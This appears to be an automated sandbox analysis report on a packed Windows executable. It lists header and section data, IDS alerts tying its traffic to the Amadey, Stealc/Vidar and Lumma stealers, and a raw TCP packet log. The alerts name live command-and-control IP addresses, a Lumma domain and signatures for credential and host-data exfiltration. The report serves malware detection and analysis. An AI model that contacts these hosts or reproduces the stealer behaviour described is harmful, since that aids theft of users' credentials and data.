                                                                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                Time Stamp:0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
                                                                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                                                OS Version Major:6
                                                                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                                                                File Version Major:6
                                                                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                                                                Subsystem Version Major:6
                                                                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                                                                Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                                                jmp 00007FB6CD6E17BAh

                                                                                                                                                                                                                                                Data Directories

                                                                                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x448.rsrc
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x311e3c0x10utqttalq
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x311dec0x18utqttalq
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                Sections

                                                                                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                0x10000x680000x6800031390662bd3305d29b9857775d3d8fe2False0.5596290001502404data7.107829480645206IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                .rsrc0x690000x4480x60023f61aeefa7c3d30c07a21aa8f45e969False0.3053385416666667data5.28505835027857IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                utqttalq0x6b0000x2a70000x2a70000177bde09daec2f183e4874387e0bf17unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                cjsrlafd0x3120000x10000x4009481bef22269e73ba0d5fca17312e0cdFalse0.798828125data6.161906886281751IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                .taggant0x3130000x30000x2200b27fad6812487249196500a8d80e8094False0.08835018382352941DOS executable (COM)0.986034442818025IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                                                                                                Resources

                                                                                                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                RT_MANIFEST0x690700x256ASCII text, with CRLF line terminators0.5100334448160535
                                                                                                                                                                                                                                                RT_MANIFEST0x692c80x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                                                                                                                                                                                                                Imports

                                                                                                                                                                                                                                                DLLImport
                                                                                                                                                                                                                                                kernel32.dlllstrcpy

                                                                                                                                                                                                                                                Possible Origin

                                                                                                                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                EnglishUnited States

                                                                                                                                                                                                                                                Network Behavior

                                                                                                                                                                                                                                                Suricata IDS Alerts

                                                                                                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                2024-12-13T13:52:06.120407+01002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.449736185.215.113.4380TCP
                                                                                                                                                                                                                                                2024-12-13T13:52:10.581340+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44974531.41.244.1180TCP
                                                                                                                                                                                                                                                2024-12-13T13:52:13.908213+01002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.4380192.168.2.449738TCP
                                                                                                                                                                                                                                                2024-12-13T13:52:15.268462+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449757185.215.113.4380TCP
                                                                                                                                                                                                                                                2024-12-13T13:52:16.734492+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44976331.41.244.1180TCP
                                                                                                                                                                                                                                                2024-12-13T13:52:25.086542+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449782185.215.113.4380TCP
                                                                                                                                                                                                                                                2024-12-13T13:52:25.886174+01002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST1192.168.2.449783116.203.10.31443TCP
                                                                                                                                                                                                                                                2024-12-13T13:52:25.886269+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1116.203.10.31443192.168.2.449783TCP
                                                                                                                                                                                                                                                2024-12-13T13:52:26.558843+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449789185.215.113.1680TCP
                                                                                                                                                                                                                                                2024-12-13T13:52:28.558918+01002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M11116.203.10.31443192.168.2.449795TCP
                                                                                                                                                                                                                                                2024-12-13T13:52:32.495543+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449808185.215.113.4380TCP
                                                                                                                                                                                                                                                2024-12-13T13:52:33.970816+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449814185.215.113.1680TCP
                                                                                                                                                                                                                                                2024-12-13T13:52:40.975250+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449838185.215.113.4380TCP
                                                                                                                                                                                                                                                2024-12-13T13:52:42.903217+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449840185.215.113.1680TCP
                                                                                                                                                                                                                                                2024-12-13T13:52:44.543745+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449848185.215.113.20680TCP
                                                                                                                                                                                                                                                2024-12-13T13:52:45.244670+01002044244ET MALWARE Win32/Stealc Requesting browsers Config from C21192.168.2.449848185.215.113.20680TCP
                                                                                                                                                                                                                                                2024-12-13T13:52:45.391909+01002044245ET MALWARE Win32/Stealc Active C2 Responding with browsers Config1185.215.113.20680192.168.2.449848TCP
                                                                                                                                                                                                                                                2024-12-13T13:52:45.767131+01002044246ET MALWARE Win32/Stealc Requesting plugins Config from C21192.168.2.449848185.215.113.20680TCP
                                                                                                                                                                                                                                                2024-12-13T13:52:46.085753+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1185.215.113.20680192.168.2.449848TCP
                                                                                                                                                                                                                                                2024-12-13T13:52:48.032867+01002044248ET MALWARE Win32/Stealc Submitting System Information to C21192.168.2.449848185.215.113.20680TCP
                                                                                                                                                                                                                                                2024-12-13T13:52:48.744449+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449848185.215.113.20680TCP
                                                                                                                                                                                                                                                2024-12-13T13:52:51.826734+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449870185.215.113.4380TCP
                                                                                                                                                                                                                                                2024-12-13T13:52:53.652658+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44987731.41.244.1180TCP
                                                                                                                                                                                                                                                2024-12-13T13:53:01.056826+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449905185.215.113.4380TCP
                                                                                                                                                                                                                                                2024-12-13T13:53:02.582364+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44991731.41.244.1180TCP
                                                                                                                                                                                                                                                2024-12-13T13:53:13.117344+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449916185.215.113.20680TCP
                                                                                                                                                                                                                                                2024-12-13T13:53:13.996798+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449944185.215.113.4380TCP
                                                                                                                                                                                                                                                2024-12-13T13:53:15.865022+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44994631.41.244.1180TCP
                                                                                                                                                                                                                                                2024-12-13T13:53:17.109153+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449916185.215.113.20680TCP
                                                                                                                                                                                                                                                2024-12-13T13:53:19.663109+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449916185.215.113.20680TCP
                                                                                                                                                                                                                                                2024-12-13T13:53:21.542915+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449916185.215.113.20680TCP
                                                                                                                                                                                                                                                2024-12-13T13:53:22.486687+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449961185.215.113.4380TCP
                                                                                                                                                                                                                                                2024-12-13T13:53:24.150793+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44996631.41.244.1180TCP
                                                                                                                                                                                                                                                2024-12-13T13:53:26.819611+01002058159ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fightlsoser .click)1192.168.2.4537951.1.1.153UDP
                                                                                                                                                                                                                                                2024-12-13T13:53:27.429681+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449916185.215.113.20680TCP
                                                                                                                                                                                                                                                2024-12-13T13:53:28.393127+01002058160ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI)1192.168.2.449977104.21.35.43443TCP
                                                                                                                                                                                                                                                2024-12-13T13:53:28.393127+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449977104.21.35.43443TCP
                                                                                                                                                                                                                                                2024-12-13T13:53:29.215731+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449916185.215.113.20680TCP
                                                                                                                                                                                                                                                2024-12-13T13:53:29.307939+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449977104.21.35.43443TCP
                                                                                                                                                                                                                                                2024-12-13T13:53:29.307939+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449977104.21.35.43443TCP
                                                                                                                                                                                                                                                2024-12-13T13:53:30.915284+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449983185.215.113.4380TCP
                                                                                                                                                                                                                                                2024-12-13T13:53:31.386872+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449986172.67.139.78443TCP
                                                                                                                                                                                                                                                2024-12-13T13:53:31.780501+01002058160ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI)1192.168.2.449987104.21.35.43443TCP
                                                                                                                                                                                                                                                2024-12-13T13:53:31.780501+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449987104.21.35.43443TCP
                                                                                                                                                                                                                                                2024-12-13T13:53:33.259132+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449987104.21.35.43443TCP
                                                                                                                                                                                                                                                2024-12-13T13:53:33.259132+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449987104.21.35.43443TCP
                                                                                                                                                                                                                                                2024-12-13T13:53:33.448771+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449986172.67.139.78443TCP
                                                                                                                                                                                                                                                2024-12-13T13:53:33.448771+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449986172.67.139.78443TCP
                                                                                                                                                                                                                                                2024-12-13T13:53:36.351248+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450256172.67.139.78443TCP
                                                                                                                                                                                                                                                2024-12-13T13:53:36.865285+01002058160ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI)1192.168.2.450257104.21.35.43443TCP
                                                                                                                                                                                                                                                2024-12-13T13:53:36.865285+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450257104.21.35.43443TCP
                                                                                                                                                                                                                                                2024-12-13T13:53:37.092124+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.450256172.67.139.78443TCP
                                                                                                                                                                                                                                                2024-12-13T13:53:37.092124+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450256172.67.139.78443TCP
                                                                                                                                                                                                                                                2024-12-13T13:53:37.831411+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.450257104.21.35.43443TCP
                                                                                                                                                                                                                                                2024-12-13T13:53:38.494748+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.450259185.215.113.1680TCP
                                                                                                                                                                                                                                                2024-12-13T13:53:42.853342+01002058160ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI)1192.168.2.450273104.21.35.43443TCP
                                                                                                                                                                                                                                                2024-12-13T13:53:42.853342+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450273104.21.35.43443TCP
                                                                                                                                                                                                                                                2024-12-13T13:53:49.315135+01002058160ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI)1192.168.2.450294104.21.35.43443TCP
                                                                                                                                                                                                                                                2024-12-13T13:53:49.315135+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450294104.21.35.43443TCP
                                                                                                                                                                                                                                                2024-12-13T13:53:54.402610+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.450303185.215.113.20680TCP
                                                                                                                                                                                                                                                2024-12-13T13:54:00.073321+01002058160ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI)1192.168.2.450323104.21.35.43443TCP
                                                                                                                                                                                                                                                2024-12-13T13:54:00.073321+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450323104.21.35.43443TCP
                                                                                                                                                                                                                                                2024-12-13T13:54:07.141813+01002058160ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI)1192.168.2.450345104.21.35.43443TCP
                                                                                                                                                                                                                                                2024-12-13T13:54:07.141813+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450345104.21.35.43443TCP
                                                                                                                                                                                                                                                2024-12-13T13:54:08.149538+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.450345104.21.35.43443TCP
                                                                                                                                                                                                                                                2024-12-13T13:54:08.398157+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450351172.67.139.78443TCP
                                                                                                                                                                                                                                                2024-12-13T13:54:13.816837+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450367172.67.139.78443TCP
                                                                                                                                                                                                                                                2024-12-13T13:54:15.092861+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.450367172.67.139.78443TCP
                                                                                                                                                                                                                                                2024-12-13T13:54:16.250203+01002058160ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI)1192.168.2.450376104.21.35.43443TCP
                                                                                                                                                                                                                                                2024-12-13T13:54:16.250203+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450376104.21.35.43443TCP
                                                                                                                                                                                                                                                2024-12-13T13:54:20.854618+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450382172.67.139.78443TCP
                                                                                                                                                                                                                                                2024-12-13T13:54:22.867908+01002058160ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI)1192.168.2.450384104.21.35.43443TCP
                                                                                                                                                                                                                                                2024-12-13T13:54:22.867908+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450384104.21.35.43443TCP
                                                                                                                                                                                                                                                2024-12-13T13:54:23.966114+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450384104.21.35.43443TCP
                                                                                                                                                                                                                                                2024-12-13T13:54:26.880579+01002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.4380192.168.2.450383TCP
                                                                                                                                                                                                                                                2024-12-13T13:54:29.268000+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.450388185.215.113.4380TCP
                                                                                                                                                                                                                                                2024-12-13T13:54:38.587777+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450396172.67.139.78443TCP
                                                                                                                                                                                                                                                2024-12-13T13:54:44.216252+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1116.203.10.31443192.168.2.450402TCP
                                                                                                                                                                                                                                                2024-12-13T13:54:46.262733+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450413172.67.139.78443TCP
                                                                                                                                                                                                                                                2024-12-13T13:54:46.964921+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.450413172.67.139.78443TCP
                                                                                                                                                                                                                                                2024-12-13T13:54:47.138665+01002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M11116.203.10.31443192.168.2.450412TCP
                                                                                                                                                                                                                                                2024-12-13T13:54:57.481567+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450448172.67.139.78443TCP
                                                                                                                                                                                                                                                2024-12-13T13:55:00.672116+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.450448172.67.139.78443TCP
                                                                                                                                                                                                                                                2024-12-13T13:55:02.679513+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450458172.67.139.78443TCP
                                                                                                                                                                                                                                                2024-12-13T13:55:04.529557+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450458172.67.139.78443TCP
                                                                                                                                                                                                                                                2024-12-13T13:57:22.338664+01002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.450555185.215.113.4380TCP

                                                                                                                                                                                                                                                Network Port Distribution

                                                                                                                                                                                                                                                TCP Packets

                                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                Dec 13, 2024 13:51:12.364912033 CET49675443192.168.2.4173.222.162.32
                                                                                                                                                                                                                                                Dec 13, 2024 13:51:29.420694113 CET4972380192.168.2.4199.232.210.172
                                                                                                                                                                                                                                                Dec 13, 2024 13:51:29.540862083 CET8049723199.232.210.172192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:51:29.540963888 CET4972380192.168.2.4199.232.210.172
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:04.635579109 CET4973680192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:04.755530119 CET8049736185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:04.755655050 CET4973680192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:04.755903006 CET4973680192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:04.875624895 CET8049736185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:06.118244886 CET8049736185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:06.120407104 CET4973680192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:07.631966114 CET4973680192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:07.632412910 CET4973880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:07.752223969 CET8049738185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:07.752243996 CET8049736185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:07.752315044 CET4973880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:07.752353907 CET4973680192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:07.752580881 CET4973880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:07.872467041 CET8049738185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:09.125693083 CET8049738185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:09.125930071 CET4973880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:09.133191109 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:09.253444910 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:09.253561974 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:09.253762960 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:09.373594046 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.581240892 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.581295013 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.581310987 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.581329107 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.581340075 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.581367970 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.581367970 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.581419945 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.581437111 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.581459045 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.581470013 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.581482887 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.581486940 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.581506014 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.581522942 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.581620932 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.581638098 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.581667900 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.581687927 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.701258898 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.701291084 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.701318026 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.701340914 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.705375910 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.705416918 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.705544949 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.705583096 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.773623943 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.773684978 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.773744106 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.773783922 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.776321888 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.776345015 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.776384115 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.776401043 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.784496069 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.784542084 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.784612894 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.784647942 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.792912006 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.792929888 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.792953014 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.792979956 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.801253080 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.801309109 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.801477909 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.801528931 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.809288025 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.809345961 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.809355974 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.809391022 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.817734003 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.817789078 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.817799091 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.817840099 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.826098919 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.826147079 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.826296091 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.826334000 CET4974580192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.834649086 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.834695101 CET804974531.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:10.834705114 CET4974580192.168.2.431.41.244.11
